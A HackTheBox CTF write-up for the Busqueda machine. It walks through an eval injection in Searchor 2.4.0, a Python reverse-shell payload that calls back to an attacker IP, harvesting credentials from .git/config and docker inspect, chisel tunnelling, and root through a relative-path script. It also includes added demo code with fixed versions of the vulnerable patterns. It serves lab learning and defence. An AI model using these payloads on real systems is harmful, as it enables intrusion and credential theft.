CTF-Writeups/HackTheBox/Busqueda.md
2023-08-24 23:58:28 +03:00

HackTheBox - Busqueda

NMAP

Nmap scan report for 10.10.11.208
Host is up (0.14s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)
|_  256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://searcher.htb/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: searcher.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80 (HTTP)

Visiting the web server, it redirects to searcher.htb, so let's add this domain to the /etc/hosts file.

At the bottom of the page we can see the version, Searchor 2.4.0.

Searching for exploits related to Searchor, there's a remote code execution (RCE).

Foothold

From the commit in the GitHub repository we can see that eval is being used: the search query is formatted into a string of Python code and evaluated, so whatever we put in the query runs as code. The payload closes the quoted query with ', adds exec(...) as one more call argument, closes the call with ) and comments out the rest of the line with #:

', exec("import os;os.system('id')"))#

The same primitive gives us a reverse shell (listener on 10.10.14.92:2222):

', exec("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.92',2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"))#
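To make the bug class concrete, here is an added example that is not Searchor's code and not part of the original writeup: a stand-in Engine class and a search function rebuilt from the description above (string-formatted input passed to eval), next to a fixed version that resolves the engine by attribute lookup and passes the query as data. The class and function names, and the SIDE_EFFECT list the injected code appends to, are assumptions for the demo.

```python
# Added example: the injection pattern behind the Searchor foothold, rebuilt
# as a minimal stand-in. The Engine class and the function bodies are
# assumptions modelled on the writeup's description, not Searchor's own code.


class Engine:
    """Stand-in for the engine lookup the search command performs."""

    class Google:
        @staticmethod
        def search(query, copy_url=False, open_web=False):
            # Illustration only: no URL-encoding, no clipboard/browser side effects.
            return "https://www.google.com/search?q=" + query


# Records whether injected code ran; the exec() in PAYLOAD appends to it.
SIDE_EFFECT = []


def vulnerable_search(engine, query, copy_url=False, open_web=False):
    """The bug class: user input is formatted into source text and eval'd."""
    return eval(
        f"Engine.{engine}.search('{query}', copy_url={copy_url}, open_web={open_web})"
    )


def safe_search(engine, query, copy_url=False, open_web=False):
    """Fix: resolve the engine by attribute lookup and pass the query as data."""
    cls = getattr(Engine, engine, None)
    if cls is None or not hasattr(cls, "search"):
        raise ValueError(f"unknown engine {engine!r}")
    return cls.search(query, copy_url=copy_url, open_web=open_web)


# Same shape as the writeup's payload: close the quoted query, add exec(...)
# as one more argument, close the call, comment out the rest of the line.
PAYLOAD = "', exec(\"SIDE_EFFECT.append('injected code ran')\"))#"


def demo_searchor_injection():
    """Returns (vulnerable_result, vulnerable_side_effects, safe_result, safe_side_effects)."""
    SIDE_EFFECT.clear()
    vuln = vulnerable_search("Google", PAYLOAD)
    vuln_effects = list(SIDE_EFFECT)
    SIDE_EFFECT.clear()
    safe = safe_search("Google", PAYLOAD)
    safe_effects = list(SIDE_EFFECT)
    return vuln, vuln_effects, safe, safe_effects


if __name__ == "__main__":
    print(demo_searchor_injection())
```

With the vulnerable function the exec() runs and the query that reaches the engine is empty (the injected exec(...) became the second positional argument); with the fixed function the whole payload is just a literal query string and nothing executes. The lookup-by-name version also rejects an engine argument that tries to smuggle in extra code, since getattr does not parse dots or semicolons.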

After getting a shell, stabilise it into a full TTY with python3.

Check whether we can run anything as root or as another user with sudo -l.

Looking at locally listening services, port 3000 is open and running an instance of Gitea.

It requires credentials, so there's no use going there until we find some.

Privilege Escalation (root)

The .git/config file in /var/www/app contains the Gitea password of the user cody, and the same password works for the local user svc (password reuse).

With sudo -l we can now check what we are allowed to run.

svc can run /opt/scripts/system-checkup.py as root; through this script we can run the subcommands docker-ps, docker-inspect and full-checkup.

We can inspect the config of the mysql_db container:

sudo -u 'root' /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect --format='{{json .Config}}' mysql_db

Inspecting the container config, we get the passwords of both the gitea and root MySQL users (they are passed to the container as environment variables, which docker inspect shows under Config.Env).

With the gitea MySQL user we can log in to the gitea database.

Now that we have credentials, we can try logging in to Gitea by forwarding port 3000 with chisel. Start the server on the attacking machine first, then connect the client from the target:

chisel server -p 3333 --reverse
chisel client 10.10.14.92:3333 R:localhost:3000

Logging in with cody's account, there's nothing there except the Searcher_site repo, which is just the site we saw at the beginning.

The gitea database password is reused for Gitea's administrator account, so we can log in as administrator.

The administrator has access to the scripts repository containing those Python scripts, so we can read what system-checkup.py actually does.

system-checkup.py runs its commands through subprocess with argument lists, which is safe against shell injection, but the full-checkup command executes a script named full-checkup.sh by name from the current working directory rather than by an absolute path. So we create our own full-checkup.sh containing a reverse shell, make it executable, and run the full-checkup command from that directory so that our script is executed as root.
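The relative-path pitfall, as an added example that is neither the box's system-checkup.py nor part of the original writeup: the vulnerable call runs ./full-checkup.sh from whatever directory the caller chose, while the hardened variant builds an absolute path and refuses a symlink, a file owned by someone else, or a group/world-writable file before executing. The temp-directory layout, the script bodies and the "owner must be the invoking user" rule are assumptions so the demo runs offline as an unprivileged user; on the real host the check would require root ownership.

```python
# Added example (not the box's own script): the relative-path pitfall behind the
# full-checkup privilege escalation, next to a hardened variant. The directory
# layout is constructed in temp dirs so the demo runs offline as a normal user.
import os
import stat
import subprocess
import tempfile


def run_full_checkup_vulnerable():
    """Pattern the writeup describes: the helper is run by a relative path,
    so whichever full-checkup.sh sits in the current directory is executed."""
    proc = subprocess.run(["./full-checkup.sh"], capture_output=True, text=True)
    return proc.stdout.strip()


def run_full_checkup_hardened(script_dir):
    """Absolute path plus ownership/permission checks before executing."""
    path = os.path.join(script_dir, "full-checkup.sh")
    st = os.lstat(path)  # lstat: do not follow a symlink planted under that name
    if stat.S_ISLNK(st.st_mode):
        raise PermissionError(f"{path} is a symlink")
    # Assumption for the demo: the trusted owner is the invoking user; on the
    # real host the check would require root ownership (st.st_uid == 0).
    if st.st_uid != os.geteuid():
        raise PermissionError(f"{path} is not owned by the expected user")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        raise PermissionError(f"{path} is group/world writable")
    proc = subprocess.run([path], capture_output=True, text=True, cwd=script_dir)
    return proc.stdout.strip()


def _write_script(directory, body):
    """Constructed helper script for the demo (stands in for a real checkup)."""
    path = os.path.join(directory, "full-checkup.sh")
    with open(path, "w") as fh:
        fh.write("#!/bin/sh\n" + body + "\n")
    os.chmod(path, 0o700)
    return path


def demo_full_checkup():
    """Returns (what the vulnerable call ran, what the hardened call ran)."""
    with tempfile.TemporaryDirectory() as trusted, tempfile.TemporaryDirectory() as attacker:
        _write_script(trusted, "echo legit checkup")
        _write_script(attacker, "echo attacker script ran")  # stands in for the reverse shell
        cwd = os.getcwd()
        os.chdir(attacker)  # the attacker picks the cwd for 'sudo ... full-checkup'
        try:
            vuln = run_full_checkup_vulnerable()
            hard = run_full_checkup_hardened(trusted)
        finally:
            os.chdir(cwd)
    return vuln, hard


def demo_rejects_writable():
    """Hardened variant must refuse a script that other users could edit."""
    with tempfile.TemporaryDirectory() as d:
        path = _write_script(d, "echo should not run")
        os.chmod(path, 0o777)
        try:
            run_full_checkup_hardened(d)
        except PermissionError:
            return True
    return False


if __name__ == "__main__":
    print(demo_full_checkup(), demo_rejects_writable())
```

Run from the attacker-controlled directory, the vulnerable call executes the planted script while the hardened call still runs the trusted one; the writable-file case shows why the permission check matters even when the path is absolute.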

References